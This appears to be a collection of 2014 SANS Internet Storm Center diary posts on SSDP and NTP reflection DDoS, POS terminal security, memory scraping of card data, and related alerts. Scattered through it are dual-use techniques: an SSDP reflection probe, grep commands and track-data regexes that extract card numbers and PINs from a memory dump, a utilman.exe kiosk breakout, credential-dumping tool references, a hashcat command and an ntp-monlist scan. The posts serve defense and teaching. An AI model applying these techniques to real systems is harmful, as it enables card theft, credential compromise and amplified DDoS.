Diaries

Published: 2014-08-31

1900/UDP (SSDP) Scanning and DDOS

Over the last few weeks we have detected a significant increase in scanning for 1900/UDP and a huge increase in 1900/UDP being used for amplified reflective DDOS attacks.  1900/UDP is the Simple Service Discovery Protocol (SSDP), which is a part of Universal Plug and Play (UPnP). The limited information available to me indicates that the majority of the devices being used in these DDOS attacks are D-Link routers, along with some other devices, most likely unpatched or unpatchable and vulnerable to the UPnP flaws announced by HD Moore in January of 2013.

In the corresponding interval we have also seen a significant decrease in Network Time Protocol (NTP) based DDOS.  The big question in my mind is why the attackers have decided to switch from NTP, which has a maximum amplification factor of 600-plus, to SSDP, which has an amplification factor of approximately 30.
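For reference, the reflection traffic in these attacks is typically triggered by a standard SSDP M-SEARCH discovery probe sent to the device with a spoofed source address. A sketch of what such a probe looks like (not taken from captures of this particular campaign):

M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: "ssdp:discover"
MX: 2
ST: ssdp:all

A vulnerable device answers a roughly 100-byte request like this with one 200 OK response per service it exposes, which is where the approximately 30x amplification comes from.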

If anybody has any more information on this, or even better yet, packet captures from one of the devices being used as a reflector, please let me know!

-- Rick Wanner - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

2 Comments

Published: 2014-08-29

False Positive or Not? Difficult to Analyze Javascript

Our reader Travis sent us the following message:

We have had 2 users this morning hit a Forbes page: hxxp://www.forbes.com/sites/jimblasingame/2013/05/07/success-or-achievement/

And then after being referred from there to: hxxp://ml314.com/tag.aspx?2772014

They are setting off our FireEye web appliance. It is advising that this is an "Infection Match"; I am not entirely familiar with their system's determinations as it is fairly new to us. I pulled down the source of the link they went to and can submit that as well if you would like it, but I haven't had a chance to look at it yet, just beautified it and saved it.

I went ahead and downloaded the "ml314.com" URL using wget, and what comes back is heavily obfuscated Javascript. I am just quoting some excerpts of it below:

(function(a){var g=window.document;var h=[];var e=[];var f=(g.readyState=="complete"||g.readyState=="loaded"||g.readyState=="interactive");var d=null;var j=function(k){try{k.apply(this,e)}catch(l){if(d!==null){d.call(this,l)}}};var c=functi...36);F=p(F,D,B,G,E[1],12,-389564586);G=p(G,F,D,B,E[2],17,606105819);B=p(B,G,F,D,E[3],22,-1044525330);D=p(D,B,G,F,E[4],7,-176418897);F=p(F,D,B,G,E[5],12,1200080426);G=p(G,F,D,B,E[6],17,-1473231341);B=p(B,G,F,D,E[7],22,-45705983);D=p(D,B,G,F,E[8],7,1770035416);F=p(F,D,B,G,E[9],12,-1958414417);G=p(G,F,D,B,E[10],17,-42063);B=p(B,G,F,D,E[11],22,-1990404162);D=p(D,B,G,F,E[12],7,1804603682);F=p(F,D,B,G,E[13],12,-40341101);G=p(G,F,D, ... function f(o){o.preventDefault();o.stopPropagation()}function i(o){if(g){return g}if(o.matches){g=o.matches}if(o.webkitMatchesSelector){g=o.webkitMatchesSelector}if(o.mozMatchesSelector){g=o.mozMatchesSelector}if(o.msMatchesSelector){g=o.msMatchesSelector}if(o.oMat ... try{s=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");p=s.GetVariable("$version").substring(4);p=p.split(",");p=p[0]+"."+p[1]}catch(r){}if(s){q="Flash"}return{name:q,version:

In short: Very obfuscated (not just "minimized"), and a lot of keywords that point to detecting plugin versions. Something that you would certainly find in your average exploit kit. But overall, it didn't quite "add up". Not having a ton of time, I ran it through a couple of Javascript de-obfuscators without much luck. The domain "ml314.com" also looked a bit "odd", but let's see when it was registered:

$ whois ml314.com

   Domain Name: ML314.COM
   Name Server: NS.RACKSPACE.COM
   Name Server: NS2.RACKSPACE.COM
   Updated Date: 22-apr-2013
   Creation Date: 22-apr-2013
   Expiration Date: 22-apr-2018

Admin Organization: Madison Logic
Admin Street: 257 Park Ave South
Admin Street: 5th Floor

The domain name isn't new, and it is hosted in what I would call a "decent" neighborhood on the Internet. The owner information doesn't look outright fake, and indeed gives us a bit more information to solve the puzzle. Turns out that "Madison Logic" is in the web advertisement / click-through business, so what you are seeing is likely their proprietary Javascript to track users better. 

In the end, I call this a "false positive", but then again, feel free to correct me. This is just one example of how things are sometimes not simply "black/white" when it comes to odd Javascript.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

3 Comments

Published: 2014-08-27

One More Day of Trolling in POS Memory

Further to the recent story on Memory Trolling for PCI data, I was able to spend one more day fishing in memory. I dug a bit deeper and came up with more fun credit card / memory goodness from our friend the Point of Sale application.

First of all, just searching for credit card numbers returns a lot of duplicates, as indicated in yesterday's story.  In the station and POS application I was working with, it turns out that if you search for the card number string plus the word "Approved", a single line was returned per transaction, with the credit card and PIN.  For instance, to find all Visa card transactions (one record per transaction):

strings memdump.img | grep VISA | grep -i APPROVED  | wc -l         
     323       

In addition, I was able to find several hundred debit card numbers, simply by using the same search concept but with the term "INTERAC" instead.  Note that this search gets you both the approved and the not-approved transactions (the string "APPROVED" matches both).

strings memdump.img | grep INTERAC | grep -i APPROVED | wc -l
     200

With that done, I started looking at the duplicate data, and realized that some of the duplicate "records" I was tossing out looked interesting - sort of XML-like.   Upon closer inspection, it turns out that they were fully formed MS SQL posts (and no, just as with the credit card numbers themselves, I won't be sharing the text of any of those).

Interestingly, the SQL post formatted the credit card numbers as 123456******1234, such that the first 6 and last 4 digits are in clear text, but the middle digits are masked out.  

This lines right up with the PCI 2.0 spec, section 3.3, which indicates that if you mask a PAN (Primary Account Number) that way, it is no longer considered sensitive (https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf).  I'm not sure how keen I am on 3.3 - I can see that storing this info allows the merchant to use it as a "pseudo customer number", so that they can track repeat purchases and so on, but I'm not sure that the benefits outweigh the risks in this case.   I'd much prefer encryption on the reader itself, so that the merchant and POS software never see the card number at all - it's encrypted right from the reader to the payment processor (or gateway).

As I said when I started this, I'm not the expert memory carver that some of our readers are - please, use our comment section and tell us what interesting things you've found in a memory image!

===============
Rob VandenBrink
Metafore

1 Comments

Published: 2014-08-26

Point of Sale Terminal Protection - "Fortress PCI at the Mall"

This is a very broad topic, but over the last few months I've seen some really nicely protected PCI terminals.  Especially since many POS environments are still running Windows XP, this is an important topic to discuss.

Things that I've seen done very well:

First of all, only allow access to the POS app - retail staff generally don't require access to email or the internet, at least not from the sales terminal.  Most POS systems I've seen are running kiosk setups, which remove Explorer and the Start button and kill all hotkeys.  I'm often able to break out of Windows kiosk applications from the keyboard by using a hotkey combination that's been missed.  For instance, Windows+U calls utilman.exe in XP; if you replace utilman with cmd.exe, you are in.  Be sure to account for hotkeys!

If you lock down the POS terminals such that a CMD prompt, Start menu and so on are not accessible, then the classic "USB Rubber Ducky" or "Teensy" keyboard-as-a-USB-key type attack - where you drop a USB key into an exposed port while making a purchase - is that much tougher.  If you can't get a cmd prompt or some field to enter commands into, a malicious keyboard attack of this type isn't likely to succeed.

On that same note, use GPO or your endpoint protection product to lock down USB access.  Even if (or maybe especially if) a repair tech needs USB access, inserting a USB device should require a call to head office.
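If you don't have an endpoint product handy to do this, one low-tech option on Windows is to disable the USB mass storage driver outright. This is a sketch, not a substitute for a proper GPO or endpoint policy, and it won't stop a device that registers purely as a keyboard:

rem disable the USB mass storage driver (re-enable by setting Start back to 3)
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f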

Use network protections:
The local router generally establishes a VPN to head office
The POS terminal should not have internet access
The POS terminal should have only limited access to head office resources (typically a small DMZ for data collection)
Similarly, only required head office resources should have access to the POS terminal
The POS terminal should not be on the same network as, or have access to, the rest of the store.  For instance, guest wireless, security cameras, alarm systems and so on should all be in VLANs other than the POS VLAN, and none of those should have access to the POS (and vice versa)

For goodness sake, harden your store's firewall/router, and use a template (that you audit) so that you know that they are all configured correctly!  Hardening guides are available for most platforms, the Center for Internet Security's hardening guide for Cisco is a solid one to use as a guide if your perimeter device doesn't have a vendor supplied document.  Though if your firewall/router vendor doesn't have security guidance, maybe you should look at a different solution ...

If your POS terminal tries to connect to an IP that isn't yours, that's an IOC (Indicator of Compromise) - even a simple DNS query to a "different" server can be a giveaway.  If you see unexplained traffic, it's worth investigating - whitelisting stuff like this to make the alert go away is a BAD IDEA!

Use endpoint protections to your advantage.  That means AV, whitelisting and every other EP feature.  Don't install an AV product and leave it at the defaults; tune it for your POS systems.  While you can certainly circumvent AV using SET, Metasploit, Veil and so on, that's a moving target.  What might work today to evade one AV vendor might very well not work tomorrow.  Plus you'll find that getting a generic application to evade AV is tough - most of the Metasploit evasion techniques top out at a fairly small memory footprint (4K in a lot of cases).

A distributed IPS is the way to go. With hundreds or in some cases thousands of terminals, you need an IPS local to each terminal to detect IOCs as early in the process as possible.  

Secure your passwords: have a good password policy in the OS, and/or use two-factor authentication.
Don't re-use admin passwords.  If an attacker can get mimikatz onto your system, or use procdump to get an lsass memory image, then (on XP) you've likely given up most of the passwords on that system.  Even without that, once an attacker has the password hashes, anyone who's serious can use GPUs and crack all the local passwords within a few minutes (or a few days if they have to go with brute force).  
Don't store passwords under the keyboard.  In almost every POS engagement, I can lift up the keyboard and have immediate access.  It's gotten to the point that I include that photo in my reports.  Granted, in most stores getting to the keyboard can be a challenge, but if you show up with a laptop bag and say "I'm with IT, Joe (or whoever the IT Director is) sent me", you'd be surprised how much help you'll get from the sales folks.

Keep on top of current POS malware, especially the IOCs for each (the recent Backoff malware is a good example).   This week's alert from US-CERT on the new Backoff variants is a good read, for instance (https://www.us-cert.gov/ncas/alerts/TA14-212A).  The copious amount of discussion on the Target breach (and the associated BlackPOS malware) is another place to look.

Each of these protections can be circumvented on its own.  But the more you layer on, the better.  The harder you make your attacker work to penetrate your environment, the more likely they are to target someone else.  Your goal is to make things as difficult for the attacker as possible, and to force them to make as much "noise" - i.e. generate as many alarms - as possible as they work their way in, to give you a chance at blocking them at one point or another.

This is just a start at protecting a POS system or network, and it is meant as the start of a discussion - I'd be very interested to know what else folks are doing to secure their terminals.  Please use our comment form to share your approaches!

==============
Rob VandenBrink, Metafore

8 Comments

Published: 2014-08-26

Trolling Memory for Credit Cards in POS / PCI Environments

In a recent penetration test, I was able to parlay a network oversight into access to a point of sale terminal.  Given the discussions these days, the next step for me was an obvious one - memory analysis.

My first step was to drive to the store I had compromised and purchase an item.

I'm not a memory analysis guru, but the memory capture and analysis was surprisingly easy.  First, dump memory:
dumpit
Yup, it's that simple - I had the dumpit executable locally by that point (more info here: https://isc.sans.edu/diary/Acquiring+Memory+Images+with+Dumpit/17216)
or, if you don't have keyboard access (dumpit requires a physical "enter" key, I/O redirection won't work for this):
win32dd /f memdump.img
(from the SANS Forensics Cheat Sheet at https://blogs.sans.org/computer-forensics/files/2012/04/Memory-Forensics-Cheat-Sheet-v1_2.pdf )

Next, I'll dig for my credit card number specifically:

strings memdump.img | grep [mycardnumbergoeshere] | wc -l
     171

Yup, that's 171 occurrences in memory, unencrypted.  So far, we're still PCI compliant - PCI 2.0 doesn't mention cardholder data in memory, and 3.0 only mentions it in passing.  The PCI standard mainly cares about data at rest - which to most auditors means "on disk or in a database" - or data in transit, which means on the wire, capturable by tcpdump or wireshark.  Anything in memory, no matter how much of a target in today's malware landscape, has no impact on PCI compliance.

The search above was done in Windows, using strings from Sysinternals - by default this detects strings in both ASCII and Unicode.  If I repeat this in Linux (where strings defaults to ASCII only), the results change:
strings memdump.img | grep [mycardnumbergoeshere] | wc -l
     32

To get the rest of the occurrences, I also need to search for the Unicode representations, which "strings" calls out as "little-endian" encodings:
strings -el memdump.img | grep [mycardnumbergoeshere] | wc -l
     139

Which gives me the same total of 171.

Back over to Windows; let's dig a little deeper - how about my CC number and my name tied together?
strings memdump.img | grep [myccnumbergoeshere] | grep -i vandenbrink | wc -l
     1

or my CC number plus my PIN  (we're CHIP+PIN in Canada)
strings memdump.img | grep [mycardnumbergoeshere] | grep [myPINnumber]
     12

Why exactly the POS needs my PIN is beyond me!

Next, let's search this image for a number of *other* credit cards - rather than digging by number, I'll search for issuer name so there's no mistake.  These searches all use the Sysinternals "strings", since its defaults lend themselves better to our search:

CAPITAL ONE       85
VISA             565
MASTERCARD      1335
AMERICAN EXPRESS  20

and for kicks, I also searched for debit card prefixes (I only search for a couple with longer IIN numbers):
Bank of Montreal   500766    245
TD Canada Trust    589297    165

Looking for my number + my CC issuer in the same line gives me:
strings memdump.img | grep [myccnumbergoeshere] | grep MASTERCARD | wc -l
gives me a result of "5"

So, assuming that this holds true for others (it might not, even though the counts are all divisible by 5), this POS terminal has hundreds, but more likely thousands, of valid numbers in memory, along with names, PINs and other information.

Finally, looking for a full magstripe in memory:

The search for a full stripe:
grep -aoE "(((%?[Bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))" memdump.img  | wc -l
    0

where:

    -a = Processes a binary file as text
    -o = Shows only the matched text
    -E = Treats the pattern as an extended regular expression

or using this regex to find Track 1 strings only:

((%?[Bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)
gives us 0 results.

or this regex to find Track 2 strings only:

([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?)  
Gives us 162  (I'm not sure how much I trust this number)

Anyway, what this tells me is that this store isn't seeing very many folks swipe their cards - it's all CHIP+PIN (which you'd expect).

(Thanks to the folks at bromium for the original regular expressions and breakdown: http://labs.bromium.com/2014/01/13/understanding-malware-targeting-point-of-sale-systems/)

Getting system uptime (from the system itself) wraps up this simple analysis - the point of this being "how long does it take to collect this much info?"

net statistics server | find "since"
shows us that we had been up for just under 4 days.

Other ways to find uptime?
from the CLI:
systeminfo | find "Boot Time"
or, in powershell:
PS C:\> Get-WmiObject win32_operatingsystem | select csname, @{LABEL='LastBootUpTime';EXPRESSION={$_.ConverttoDateTime($_.lastbootuptime)}}
or, in wmic:
wmic os get lastbootuptime
or, if you have sysinternals available, you can just run "uptime"


What does this mean for folks concerned with PCI compliance?
Today, not so much.  Lots of environments are still operating under PCI 2.0.  PCI 3.0 simply calls for education on the topic of good coding practices to combat memory scraping.  Requirement 6.5 phrases this as "Train developers in secure coding techniques, including how to avoid common coding vulnerabilities, and understanding how sensitive data is handled in memory.  Develop applications based on secure coding guidelines."

Personally (and this is just my opinion), I would expect/hope that the next version of PCI will specifically call out encryption of card and personal information in memory as a requirement.  If things play out that way, what this will mean for the industry is that either:
a/ folks will need to move to card readers that encrypt before the information is on the POS terminal
or
b/ if they are using this info to collect sales / demographic information, they might instead tokenize the CC data for the database, and scrub it from memory immediately after.  All  I can say to that approach is "good luck".  Memory management is usually abstracted from the programming language, so I'm not sure how successful you'd be in trying to scrub artifacts of this type from memory.

===============
Rob VandenBrink, Metafore

4 Comments

Published: 2014-08-25

UDP port 1900 DDoS traffic

I guess this is my day for asking for feedback from our readers.  Again, I'm going to ask "Got packets?"  On 22 Aug, one of our readers (Paul) commented on the Port 1900 page [1] that he was seeing a DDoS on port 1900, with packet sizes of 300 bytes.  This is a development we've been watching at $dayjob, too, but I was wondering if anyone (including Paul) has packets so we can try to figure out what the amplification mechanism might actually be (if you have the packets, please share via the contact page).  What we're seeing in DShield data is a little odd and different from what I'm seeing at $dayjob.  You'll note below that there were more targets until they suddenly dropped off on 18 Jun.  On the other hand, the sources seem to be trending upward (at least, peaking higher).  Unfortunately, we only have source and target counts in the DShield data, not byte volumes.  Compare that with what we're seeing at $dayjob, as shown in the webcast we do weekly there (from 39:55 in this video [2] -- watch to about 47:00 if you want to see our discussion of all the reflective DoS ports we're watching).

References:
[1] https://isc.sans.edu/port.html?port=1900
[2] http://techchannel.att.com/play-video.cfm/2014/8/14/AT&T-ThreatTraq-1-Billion-Accounts-Hacked

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

6 Comments

Published: 2014-08-25

Unusual CRL traffic?

One of our readers, Brian, wrote in this morning saying that he was seeing an unusually high volume of traffic attempting to check certificate revocation lists (CRLs) from lots of different IPs (so it doesn't look like a denial of service attack; there are lots of both sources and destinations).  I haven't heard of anything going on that would cause this behavior, but thought I'd ask our readers if they are seeing anything similar.  Could a patch have caused it?  Microsoft did patch IE 10 days ago, but that would be quite a lag time.  If anyone else is seeing this and could grab a sample of the traffic (so we could look at User-Agents, etc.), please respond below or through our contact page.  Thanks in advance for your assistance.
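If you want to grab such a sample, something along these lines should work; the capture filter is an assumption on my part (most CRL fetches ride over plain HTTP on port 80, but OCSP and LDAP-based checks won't be caught this way), and older tshark builds use -R instead of -Y:

# capture a few minutes of outbound HTTP from the affected segment
tcpdump -nn -s0 -w crl-sample.pcap 'tcp dst port 80'
# then pull out just the CRL requests, with source IP, host, User-Agent and URI
tshark -r crl-sample.pcap -Y 'http.request.uri contains ".crl"' -T fields -e ip.src -e http.host -e http.user_agent -e http.request.uri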

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

2 Comments

Published: 2014-08-23

NSS Labs Cyber Resilience Report

Bob Walder and Chris Morales of NSS Labs have published an interesting brief. Based on last year's IPS, firewall and endpoint protection tests, the effectiveness of the best device scored was 98.5%. While this is considered excellent, there are still ~2 percent of attacks that make it through the perimeter and host-layer defences. Two of their proposals are to attempt to control the attacker by redirecting the attack against a target you can watch and control (i.e. tarpit the attacker), and to regularly test your network to detect problems before someone else does and exploits them.

They have listed several recommendations, but one that I think is worth focusing on is: "Prepare to operate at 60 percent capacity in order to withstand a breach, which will reduce, but not eliminate, critical services." [1]

It is very likely the impact will affect users, customers and the business. Who is prepared to continue operating at 60% capacity without affecting business or the bottom line?

The eleven-page report can be downloaded here [1].

[1] https://www.nsslabs.com/system/files/public-report/files/Cyber%20Resilience_0.pdf
[2] https://www.nsslabs.com/blog/cyber-resilience-%E2%80%93-it%E2%80%99s-not-98-you-catch-matters-it%E2%80%99s-2-you-miss

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

1 Comments

Published: 2014-08-22

OCLHashCat 1.30 Released

For those of us who are using GPUs to turn hashes into passwords and other useful info, the folks at hashcat.net have released a new version of OCLHashCat.

What's new?
Performance increases in almost every algorithm

New hashing algorithms:
md5($salt.md5($pass))  (added just for  Mediawiki B)
Mediawiki B type
Kerberos 5 AS-REQ Pre-Auth etype 23 as fast algorithm (reimplementation)
Android FDE
scrypt
Password Safe v2
Lotus Notes/Domino 8

New parsers
Skype
PeopleSoft

Full release notes here: https://hashcat.net/forum/thread-3627.html
Download here:  http://hashcat.net/oclhashcat/
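As a quick, hedged example of running one of the newly supported formats through the new version (the mode number is from memory, and binary names differ between the AMD and NVIDIA builds, so check --help on your copy):

# straight wordlist attack against Kerberos 5 AS-REQ Pre-Auth etype 23 hashes
./oclHashcat64.bin -m 7500 -a 0 krb5pa.hashes wordlist.txt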

Posted on Behalf of Rob.

~Richard

--Handler on Duty

0 Comments

Published: 2014-08-21

Now supporting OpenIOC via our API!

The SANS Internet Storm Center is proud to announce the release of our first OpenIOC format API call. We have been hard at work writing a method that serves our firewall logs as OpenIOC XML content dynamically from a RESTful HTTP request. This is a critical step in expanding our service offerings to you, our readers, members and contributors.
 
You can use tools that ISC handler Russ McRee mentioned in a previous diary to convert output from this new method into STIX format. This is just the beginning however; the development roadmap includes the addition of another API method with the same data served in STIX format!
 
Ready to get started? View the documentation here: https://isc.sans.edu/api/#openiocsources
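A quick way to kick the tires from the command line; note that the exact method path below is my guess based on the documentation anchor above, so confirm it against the API docs before scripting around it:

curl 'https://isc.sans.edu/api/openiocsources'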
 
Please share your feedback as well as use cases and success stories as they unfold in the comments below.
 
A big thanks to Russ McRee for his assistance with testing and the writing of this announcement!

-- 
Alex Stanford - GIAC GWEB & GSEC
Research Operations Manager,
SANS Internet Storm Center

0 Comments

Published: 2014-08-20

Social Engineering Alive and Well

The muse for this diary is far from hot off the press. Many of you may have already come across the click-through scam on Facebook touting a video recording taken of Robin Williams moments before his death.  

In case you had not heard, Robin Williams was a popular American movie actor and entertainer who recently took his own life at the age of 63.  The general public's open expression of grief over his passing has given some evildoers an opening to take advantage of human emotion.

Snopes.com has a write-up on this scam [1], and I can offer a couple of details on it.
An image like this one will show up in your Facebook feed, enticing you to click to view the video of Robin Williams.



Once the link is clicked, it will again bait the user to fill out a survey and provide some information (PII).
The following image shows the next step.


 

Clicking through this type of scam opens up a list of vectors through which the user can be exploited. So please beware, and educate your family, friends, and co-workers.

Let this also be a wake-up call for other soft spots.  The ALS Ice Bucket Challenge is a viral marketing success that could easily be exploited. So don't always trust, and don't always feel the need to satisfy your curiosity.

Safe clicking.

 
[1] http://www.snopes.com/computer/facebook/robinwilliams.asp

 

1 Comments

Published: 2014-08-17

Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that with no port forwarding enabled through the firewall that Internet originated NTP requests were getting past the firewall to the misconfigured NTP server?

These packets are passing the firewall because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled, the firewall would treat outbound UDP transactions as I described earlier.  When a device on your network initiates an outbound connection to a server, responses from that server are permitted back into your network.  Since UDP is stateless, most firewalls simulate state with a timeout.  In other words, if no traffic is seen between the device and the server for 600 seconds, then no response from the server is permitted until there is new outbound traffic. But any time related traffic is seen on the correct port, the timer is reset to 600 seconds, making it possible for this communication to continue virtually forever as long as one or both devices continue to communicate. Visually that looks like:

However, if UDP Session Control is disabled, as it is in this device, then the device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem, since the only port exposed is the original ephemeral source port, and it is waiting for an NTP reply.  It is not likely to be used as an NTP reflector.  But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric mode in which, instead of the originating device picking an ephemeral port for the outbound connection, both the source and the destination ports are 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server for use as an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes, they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed, the replies will not go back to the attacker, but will go to a victim instead. 

Of course UDP is stateless, so the source IP can be spoofed, and there is no way for the receiver of the NTP request to validate the source IP or source port, permitting the attacker to direct the attack against any IP and port on the Internet.  It is exceedingly difficult to trace these attacks back to the source, so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds, they can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of the attackers holding these communications open for months.  

What are the lessons to be learned here:

  • If all ISPs fully implemented anti-spoofing filters, then the likelihood of this sort of attack would be lowered substantially.  In a nutshell, anti-spoofing says that if traffic is headed into my network and the source IP address is from my network, then the source IP must be spoofed, so drop the packet.  It also works in the converse: if a packet is leaving my network and the source IP address is not an IP address from my network, then the source IP address must be spoofed, so drop the packet.
  • It can't hurt to check your network for NTP servers.  A single nmap command will quickly confirm if any are open on your network: nmap -sU -A -n -PN -pU:123 --script=ntp-monlist .  If you find one or more, perhaps you can contact the vendor for a possible resolution (for NTP servers you control yourself, a hardening sketch follows this list).
  • If you own a gateway router that implements full-cone NAT, you may want to see if it implements the equivalent of the Pace "Strict UDP Session Control".  This will prevent an attacker from accessing misconfigured UDP servers on your network. 
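For *nix NTP servers you do control (as opposed to embedded devices you can't touch), a minimal ntpd hardening sketch looks something like the following; exact directives vary by ntpd version, so treat this as a starting point rather than a drop-in config:

# /etc/ntp.conf excerpt
disable monitor                                        # turn off the monlist feature abused for amplification
restrict default kod nomodify notrap nopeer noquery    # no status queries or reconfiguration from anywhere
restrict 127.0.0.1                                     # keep full access from localhost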

-- Rick Wanner - rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

1 Comments

Published: 2014-08-17

Part 1: Is your home network unwittingly contributing to NTP DDOS attacks?

For the last year or so, I have been investigating UDP DDOS attacks. In this diary I would like to spotlight a somewhat surprising scenario where a manufacturer’s misconfiguration on a popular consumer device combined with a design decision in a home gateway router may make you an unwitting accomplice in amplified NTP reflection DDOS attacks.

This is part 1 of the story.  I will publish the conclusion Tuesday August 19th.

Background

Today almost every house has consumer broadband services.  Typical broadband installations will have a device, usually provided by your service provider, which acts as a modem, a router and a firewall (for the rest of the diary this device will be called a gateway router).   In a nutshell the firewall in the gateway router permits network traffic initiated on your network out to the Internet, and permits responses to that traffic back into your network.  Most importantly the firewall will block all traffic destined for your network which is not a response to traffic initiated from your network.  This level of firewall capability meets the requirements of almost all broadband consumers on the Internet today.   

For those of us power users who required more capability, gateway router manufacturers tended to support a port forwarding feature that would allow us to accommodate servers and other devices behind the firewall.  This was great for us tech-savvy folk, but typically port forwarding was beyond the understanding of the average Internet user like my Dad (sorry Dad!) or my Grandma.

In the last few years, consumer devices that plug into your home network and use more complicated networking that does not fit the standard initiate-respond model have become more common.  The most common of these are gaming consoles, but other devices like home automation and storage devices can also be an issue.  As stated above, setting up port forwarding so these devices will function properly is beyond the average Internet user's capability.  Luckily the gateway router vendors have thought of that as well. 

To simplify connecting these devices, gateway router vendors tend to implement one of two approaches: most support Universal Plug and Play (UPnP), with a minority of vendors supporting full-cone NAT.  

Investigation

It begins with a complaint from a reputable source that a customer is participating in a reflective NTP DDOS attack utilizing monlist for amplification.

The complaint is against XXX.160.28.174, a dynamic-address broadband customer.  The analyst's first thought is that a tech-savvy user has set up an NTP server and added port forwarding to their router.  It should be easy to resolve: contact the customer, tell them to patch their NTP server to the current version, and everything will be great!  Unfortunately, this is where things go sideways.

While network monitoring clearly shows this customer’s connection participating in a NTP DDOS attack:

Review of the firewall configuration showed that there are no ports forwarded on the firewall.

But the NAT logs in the firewall show a large number of outbound connections to various addresses originating from this device and most of them don’t appear to be to NTP servers. 

172.16.1.64:123, f: 192.75.12.11:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 199.182.221.110:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 142.137.247.109:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 129.128.5.211:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 206.108.0.132:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 94.185.82.194:443, n: XXX.160.28.174:123
172.16.1.64:123, f: 60.226.113.100:80, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:38553, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:47782, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:53177, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:43397, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:15673, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:17275, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:63467, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:56970, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:64682, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:26332, n: XXX.160.28.174:123
172.16.1.64:123, f: 101.166.182.210:80, n: XXX.160.28.174:123

According to the NAT table, the address behind the gateway router that is initiating the outbound UDP sessions is at 172.16.1.64. The device table shows it as:

Name: home-controller-300-000FFF13C150
Hardware Address: 00:0f:ff:13:c1:50

That MAC address is owned by a company called Control4, which makes popular home automation devices. It is clear that the Control4 device has a configuration problem.  There is likely no reason for Control4 to be running an NTP server on a home automation device, and certainly that NTP server should not support the monlist command. Most likely this is a result of the Linux/Unix quirk that when you implement an NTP client on a *nix platform, you almost always wind up with an NTP server enabled as well, which you need to manually disable. Either way, I was in contact with Control4; they were aware of the issue and have released a patch, so any Control4 devices that call home to the mothership should be resolved.  Unfortunately they have a significant number of devices that, for some reason, don't call home and can't be patched until they do.  But this is not just a Control4 problem.  In the course of my investigation I found Macintosh computers, FreeNAS devices, Dell servers and D-Link storage devices displaying the same behavior. But even if there is a misconfigured NTP server on these networks, if the firewall is working properly, then no uninitiated connections should be permitted in, and these devices should not be capable of being used as reflectors.

An nmap scan shows that not only is it possible to connect through the firewall, but that there is clearly an NTP server answering queries and that permits the monlist command, maximizing the amplification.

123/udp open          ntp     NTP v4

| ntp-monlist: 

|   Target is synchronised with 206.108.0.133

|   Alternative Target Interfaces:

|       172.16.1.64     

|   Public Servers (4)

|       142.137.247.109 174.142.10.100  198.27.76.239   206.108.0.133   

|   Other Associations (166)

|       24.220.174.96 seen 7615 times. last tx was unicast v2 mode 7

|       193.25.121.1 seen 2084 times. last tx was unicast v2 mode 7

|       66.26.0.192 seen 406 times. last tx was unicast v2 mode 7

|       109.200.131.2 seen 11079 times. last tx was unicast v2 mode 7

|       79.88.149.109 seen 15356 times. last tx was unicast v2 mode 7

|       66.176.8.42 seen 90397 times. last tx was unicast v2 mode 7

|       84.227.75.171 seen 58970 times. last tx was unicast v2 mode 7

|       82.35.229.219 seen 952 times. last tx was unicast v2 mode 7

|       96.20.156.186 seen 2123 times. last tx was unicast v2 mode 7

|       216.188.239.159 seen 178 times. last tx was unicast v2 mode 7

